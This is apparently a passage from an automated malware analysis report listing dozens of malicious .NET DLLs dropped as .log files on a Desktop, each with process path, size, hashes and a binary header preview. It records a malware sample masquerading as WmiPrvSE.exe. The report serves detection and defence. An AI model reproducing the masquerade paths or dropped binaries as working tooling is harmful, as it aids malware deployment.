Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\rNXibPjW.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\rgoKfKUN.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\rrlpDagQ.log

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\sOOpvBpu.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\sUsSQXQL.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\seyqUCWq.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\smiIylww.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\tLkzZqkX.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\tPKQwznS.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\tojirtOm.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\uILHvqzR.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\uMlYSzCN.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\vVohbyWj.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\vhcgKXhJ.log

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\wipYxcGI.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\wvgrNMIh.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\xBgoYyEi.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\xFRjkDBd.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\xJQGDhfo.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\xtqXCEKK.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\yCtrFDQY.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\yNVrtDVA.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\yWtgjqCG.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
